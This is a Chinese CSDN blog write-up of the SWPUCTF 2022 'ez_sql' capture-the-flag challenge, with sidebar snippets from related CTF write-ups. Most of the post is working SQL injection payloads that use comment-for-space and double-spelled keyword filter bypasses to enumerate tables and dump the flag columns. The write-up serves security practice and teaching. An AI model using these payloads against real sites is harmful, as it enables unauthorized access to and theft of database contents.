[SWPUCTF 2022 新生赛]ez_sql

最新推荐文章于 2024-04-28 16:38:04 发布
最新推荐文章于 2024-04-28 16:38:04 发布
阅读量352 收藏
点赞数
文章标签: sql 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46056107/article/details/134612097
版权

参数为1的时候没有报错,为2和任何数的时候报,发现空格被过滤了,然后union需要双拼写

4'/**/ununionion/**/select/**/1,2,3;#

发现存在3个

数据库为NSS_db

它的表有两个为,NSS_tb和users

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='NSS_db';#

查表的字段发现flag

nss=2'/**/ununionion/**/select/**/1,database(),group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb';#

查字段的数据

nss=2'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_tb;#

m0_46056107
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
ez_setup.py下载
05-16
ez_setup.py下载
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 3811
SWPUCTF 2022新生
[SWPUCTF-2022-新生]ez_sql
liaochonxiang的博客
04-24 549
根据提示,POST传参得到假的flag。
[UUCTF 2022 新生]ezsql
最新发布
liaochonxiang的博客
04-28 460
反向前后过滤了相同的字符串:or,from,wehere。
NewStarCTF2023week2-ez_sql
Welcome To Myon'Blog !
10-13 1019
闭合之后尝试判断字段数,存在WAF,使用大小写绕过(后面的sql语句也需要进行大小写绕过)尝试在表here_is_flag下查找flag。或者使用sqlmap直接跑出所有库和表内容。查一下数据库名、版本、用户等信息。查出数据库ctf下的表。
2021美团杯CTF ez-sql
iO快到碗里来
09-11 1027
MySQL 正则表达式 MySQL LIKE 子句 Python chr() 函数 Python ord() 函数 string — 常见的字符串操作 正则;REGEXP BINARY 匹配区分大小写.REGEXP 不区分大小写的匹配 fuzz一下,ban了很多东西,不过同时也留了不少可用函数。看到 =、like 被ban之后就能想到 regexp,加上引号也被ban就能联想到 \ 转义引号实现注入的姿势。 尝试一波username=admin\&password=||1%23回显 flag is
【CTF】[UUCTF 2022 新生]ez_upload
西原一点红的博客
06-19 839
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。webshell工具连接。flag 在/目录下。
打印机驱动 SW_EZ_V2.63p_b6
05-26
打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V2.63p_b6打印机驱动 SW_EZ_V...
EZ.RAR_EZ_ez-usb_编程器 51
09-19
标题“EZ.RAR_EZ_ez-usb_编程器 51”暗示了这是一个与51系列单片机编程相关的资源包,其中包含了EZ-USB编程器的相关软件和文档。EZ-USB是一种通用的USB接口解决方案,常用于开发USB设备,如编程器,它为51系列单片机...
2021年四川省大学生网络安全技能大EZSQL
woshilnp的博客
05-24 539
题目一 EZSQL 操作内容: 考点:MYSQL8新特性 fuzz之后发现,只能盲注,过滤了select,使用1' and (ascii(substr(database(),1,1)))>num --+可以盲注出数据库,但是后面就搞不动了 无select注入,使用的是table语句。 TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]] 这个作用是列出表的全部内容,于是就可以利用这个语句来进行注入。 首先需要知
[SWPUCTF 2021 新生]easy_sql
wyxlsm的博客
02-20 286
看库的表 使用函数 union_select 和 information_schema 的函数。我们可以简单看到 name:xxx password:yy 可能有数据库等你注入。这里 就看到提示你参数wllm 这边使用get 传参 让你输入点东西 可以。可以看出 使用函数 union_select 的命令 看出上限 在3。wllm =1' 可以看出字符串漏洞 去一步一步的开库。看到这个界面你直接打开F12或F11看源代码 看有什么提示。已经得出 查看flag值。
2022UUCTF-web
bossDDYY的博客
11-03 1949
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
2022 UUCTF Web
weixin_63231007的博客
12-19 2289
2022UUCTF web部分题分析
NSSCTF-[SWPUCTF 2022]-web
J1ng_Hong的博客
11-14 652
ls发现根目录下有一个flag文件,然后用cat把他读取出来就行了。然后就得到了flag。
NSSCTF做题(10)
wwwwyyyrre的博客
10-19 473
叫10好听一点,就是补9的 第7页的内容。
【Web】SWPUCTF 2022 新生 个人复现
uuzeray的博客
11-28 689
挑了部分题,太简单的就没选进来(但选进来≠有难度)
SWPU NSS新生校外通道(部分WP)
qq_63205508的博客
10-28 1059
NSSCTF、SWPU NSS新生校外通道、WP
NSSCTF第11页(3)
wwwwyyyrre的博客
11-09 622
源码发现会在写入文件之前会删除目录下的除了index.php的文件。写入文件的文件名和文件内容也是可控的,只不过存在过滤stristr函数对文件内容进行过滤,该函数绕过还是简单的,只需要添加一些特殊字符就可以了,和字符串弱类型比较相似。对于文件名的正则匹配,有点没读懂怎么个条件,到底是允许字母还是不允许,测试了一下该代码环境,运行之后明白该正则条件输入.[a-z]是可以绕过该正则的,返回false知道了这些剩下的就是利用了既然会删除除了index.php文件,直接覆盖index.php。
php upload ctf,强网杯CTF防御ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ... error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] .... echo "Upload: " .... echo "Type: " .... echo "Size: " ....
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

m0_46056107

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值